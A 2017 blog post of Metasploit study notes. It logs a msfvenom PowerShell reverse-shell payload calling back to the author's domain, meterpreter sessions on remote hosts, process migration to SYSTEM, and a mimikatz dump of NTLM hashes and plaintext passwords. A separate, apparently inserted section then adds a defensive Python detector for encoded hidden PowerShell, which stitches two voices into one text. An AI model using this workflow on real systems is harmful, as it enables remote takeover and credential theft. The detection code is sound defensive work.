Metasploit Notes 2

Author: Luan  Category: Study Notes  Published: 2017-06-24 17:37

Ran into an RCE and wanted to bring in MSF. systeminfo showed Windows 7, so PowerShell came to mind, which is very convenient.

After generating a .ps1 with msfvenom, the format did not look right. A look at the help showed that the psh-cmd output format does the job. Really convenient, so here is a note.

msf > msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd
[*] exec: msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=443 LHOST=lu4n.com -f psh-cmd

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x64 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 510 bytes
Final size of psh-cmd file: 6739 bytes

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e

msf > use multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST lu4n.com
LHOST => lu4n.com
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > run

[*] Started reverse TCP handler on 103.27.187.212:443 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (103.27.187.212:443 -> 1.1.1.1:27185) at 2017-06-24 17:12:16 +0800

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.107 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(handler) > run

[*] Started reverse TCP handler on 103.27.187.212:443 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (103.27.187.212:443 -> 2.2.2.2:63796) at 2017-06-24 17:13:12 +0800
meterpreter > sysinfo
Computer        : JDE920-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > ps 
Process List
============

 PID   PPID  Name                          Arch  Session  User                          Path
 ---   ----  ----                          ----  -------  ----                          ----
 0     0     [System Process]                                                           
 4     0     System                        x64   0                                      
 256   4     smss.exe                      x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 272   476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 332   320   csrss.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 380   372   csrss.exe                     x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 388   320   wininit.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 416   372   winlogon.exe                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 476   388   services.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 484   388   lsass.exe                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 488   476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 492   388   lsm.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 588   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 652   476   VBoxService.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\VBoxService.exe
 664   1768  cmd.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\system32\cmd.exe
 716   476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 808   476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 840   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 868   476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\svchost.exe
 1132  476   spoolsv.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1184  476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1260  476   svchost.exe                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1308  476   svchost.exe                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\system32\svchost.exe
 1348  476   FoxitConnectedPDFService.exe  x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\Foxit Software\Foxit Reader\FoxitConnectedPDFService.exe
 1428  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 1460  1768  VBoxTray.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\System32\VBoxTray.exe
 1464  1576  opmn.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe
 1572  1768  cmd.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\System32\cmd.exe
 1576  2024  opmn.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\opmn\bin\opmn.exe
 1580  476   TNSLSNR.EXE                   x64   0        JDE920-PC\920JDE              C:\Oracle\E1Local\BIN\TNSLSNR.exe
 1656  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 1716  840   dwm.exe                       x64   1        JDE920-PC\JDE920              C:\Windows\system32\Dwm.exe
 1732  476   taskhost.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\system32\taskhost.exe
 1768  1704  explorer.exe                  x64   1        JDE920-PC\JDE920              C:\Windows\Explorer.EXE
 1876  476   oracle.exe                    x64   0        JDE920-PC\920JDE              c:\oracle\e1local\bin\ORACLE.EXE
 1940  476   oravssw.exe                   x64   0        JDE920-PC\920JDE              c:\oracle\e1local\bin\OraVSSW.exe
 2160  476   wmpnetwk.exe                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Program Files\Windows Media Player\wmpnetwk.exe
 2176  1572  java.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\MIDDLE~1\OVR_HOME\ORACLE~2\jdk\bin\java.exe
 2676  476   ducservice.exe                x86   0        NT AUTHORITY\SYSTEM           C:\Program Files (x86)\No-IP\ducservice.exe
 2792  476   SearchIndexer.exe             x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchIndexer.exe
 3012  476   svchost.exe                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\system32\svchost.exe
 3136  1464  sawserver.exe                 x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\web\bin\sawserver.exe
 3144  1464  java.exe                      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\jdk\bin\java.exe
 3152  1464  nqsserver.exe                 x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsserver.exe
 3164  1464  nqscheduler.exe               x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqscheduler.exe
 3180  1464  nqsclustercontroller.exe      x64   1        JDE920-PC\JDE920              C:\Oracle\Middleware\OVR_HOME\Oracle_BI1\bifoundation\server\bin\nqsclustercontroller.exe
 3824  6196  java.exe                      x86   1        JDE920-PC\JDE920              C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe
 4288  4492  LaunchJVM.exe                 x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\LaunchJVM.exe
 4348  5764  fenix.exe                     x86   1        JDE920-PC\JDE920              C:\ProgramData\Fenix\fenix.exe
 4492  1768  activConsole.exe              x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\activConsole.exe
 4668  4492  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5104  4668  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5348  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 5436  2176  powershell.exe                x64   1        JDE920-PC\JDE920              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 5736  4572  iexplore.exe                  x86   1        JDE920-PC\JDE920              C:\Program Files (x86)\Internet Explorer\iexplore.exe
 5764  1768  fenix.exe                     x86   1        JDE920-PC\JDE920              C:\ProgramData\Fenix\fenix.exe
 6160  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
 6196  6204  cmd.exe                       x86   1        JDE920-PC\JDE920              C:\Windows\SysWOW64\cmd.exe
 6220  3824  cmd.exe                       x86   1        JDE920-PC\JDE920              C:\Windows\SysWOW64\cmd.exe
 6528  4492  jdenet_n.exe                  x86   1        JDE920-PC\JDE920              C:\JDEdwards\E920\system\bin32\jdenet_n.exe
 7036  5436  powershell.exe                x64   1        JDE920-PC\JDE920              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 7060  6220  java.exe                      x86   1        JDE920-PC\JDE920              C:\PROGRA~2\Java\JDK17~1.0_8\bin\java.exe
 7140  380   conhost.exe                   x64   1        JDE920-PC\JDE920              C:\Windows\system32\conhost.exe
meterpreter > migrate 2792 
[*] Migrating from 7036 to 2792... 
[*] Migration completed successfully. 
meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;102261  NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;98726   NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;92043   NTLM       JDE920-PC     JDE920         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;86291   NTLM       JDE920-PC     920JDE         lm{ 44efce164ab921caaad3b435b51404ee }, ntlm{ 32ed87bdb5fdc5e9cba88547376818d4 }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     JDE920-PC$     n.s. (Credentials KO)
0;24337   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     JDE920-PC$     n.s. (Credentials KO)

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     JDE920-PC$     
0;24337   NTLM                                    
0;999     NTLM       WORKGROUP     JDE920-PC$     
0;102261  NTLM       JDE920-PC     920JDE         123456
0;98726   NTLM       JDE920-PC     920JDE         123456
0;92043   NTLM       JDE920-PC     JDE920         123456
0;86291   NTLM       JDE920-PC     920JDE         123456

meterpreter > background
[*] Backgrounding session 2...
msf exploit(handler) >
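The psh-cmd launcher above is a cmd.exe one-liner that starts powershell.exe with -nop, -w hidden and a base64-encoded command, and the process list later shows exactly that powershell.exe chain (7036 under 5436). From the defender's side, that combination of flags is the thing to watch for in process-creation telemetry. The following is an added example, not code from the original post or from Metasploit: it classifies PowerShell command lines, treats any unambiguous prefix of -EncodedCommand, -WindowStyle and -NoProfile as that flag (an approximation of PowerShell's parameter matching), and decodes the encoded command so an analyst can read what would run. The event records are constructed; the first mimics the launcher's shape with a harmless command in place of the stager.

```python
import base64
import binascii
from typing import Optional


def _encode_ps(command: str) -> str:
    """Encode a command the way powershell.exe -EncodedCommand expects: base64 of UTF-16LE."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


# Constructed sample process-creation records (not from the original post).
# The first has the shape of the psh-cmd launcher with a harmless command
# standing in for the stager; the other two are ordinary admin activity.
SAMPLE_EVENTS = [
    {"pid": 7036, "ppid": 5436,
     "cmdline": "powershell.exe -nop -w hidden -e " + _encode_ps("Write-Host 'constructed sample'")},
    {"pid": 4101, "ppid": 1768,
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"pid": 4102, "ppid": 1768,
     "cmdline": "powershell.exe -NoProfile -Command Get-Date"},
]


def _is_prefix_of(flag: str, full: str, min_len: int) -> bool:
    """PowerShell accepts any unambiguous prefix of a parameter name (-e, -enc, -EncodedCommand ...)."""
    return min_len <= len(flag) <= len(full) and full.startswith(flag)


def _decode_encoded_command(blob: str) -> Optional[str]:
    """Reverse -EncodedCommand: base64 -> UTF-16LE text. None if the blob is not well formed."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_cmdline(cmdline: str) -> dict:
    """Classify one command line; decodes -EncodedCommand payloads for the analyst."""
    tokens = cmdline.split()  # samples carry no quoted spaces; a real parser must honour quoting
    result = {"encoded": False, "hidden": False, "noprofile": False, "decoded": None, "suspicious": False}
    if not tokens or not tokens[0].lower().endswith("powershell.exe"):
        return result
    for i, tok in enumerate(tokens[1:], start=1):
        if not tok.startswith(("-", "/")):
            continue
        flag = tok.lstrip("-/").lower()
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        if _is_prefix_of(flag, "encodedcommand", 1) and nxt:
            result["encoded"] = True
            result["decoded"] = _decode_encoded_command(nxt)
        elif _is_prefix_of(flag, "windowstyle", 1) and nxt.lower() == "hidden":
            result["hidden"] = True
        elif _is_prefix_of(flag, "noprofile", 3):
            result["noprofile"] = True
    # Encoded command plus a hidden window or a skipped profile is the launcher pattern.
    result["suspicious"] = result["encoded"] and (result["hidden"] or result["noprofile"])
    return result


def scan(events) -> list:
    """Return the events whose command line matches the encoded + hidden/noprofile pattern."""
    alerts = []
    for ev in events:
        verdict = analyze_cmdline(ev["cmdline"])
        if verdict["suspicious"]:
            alerts.append({"pid": ev["pid"], "ppid": ev["ppid"], **verdict})
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"pid {alert['pid']} (parent {alert['ppid']}): encoded PowerShell, "
              f"decoded = {alert['decoded']!r}")
```

Decoding matters more than the flags themselves: the 6739-byte psh-cmd output is opaque in a process log, but the UTF-16LE text behind it is the script that actually runs, and that is what goes into the incident record.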


3 comments
  • wenyu

    2017-08-02 10:31 AM

    Was going to tip you... but there's no link, hahaha

  • lsh4ck

    2017-07-26 11:56 AM

    Yours is done.
    Mine:
    lsh4ck's blog
    www.lshack.cn

    1. Luan

      2017-07-27 12:32 PM

      I don't see it.